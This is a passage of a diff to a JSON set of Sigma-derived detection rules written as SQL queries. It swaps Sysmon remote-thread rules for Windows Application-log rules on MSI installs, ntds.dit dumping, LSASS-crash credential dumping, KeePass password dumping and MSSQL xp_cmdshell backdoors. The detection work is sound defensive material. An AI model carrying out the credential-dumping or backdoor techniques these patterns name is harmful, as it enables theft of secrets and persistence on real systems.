"Nasreddine Bencherchali (Nextron Systems)", + "description": "An application has been removed. 
Check if it is critical.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_builtin_remove_application.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 
'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "sysmon_process_hollowing.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "status": "experimental", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "status": "experimental", + "description": "Detects PoC tool used 
to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE 
'\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": 
"create_remote_thread_win_susp_targets.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "author": "Florian Roth (Nextron Systems)", + 
"tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. 
This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Antivirus products" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", - "status": "experimental", - 
"description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1055" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "status": "experimental", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' 
AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL SPProcoption Set", 
+ "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.persistence" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate use of the feature by administrators (rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination 
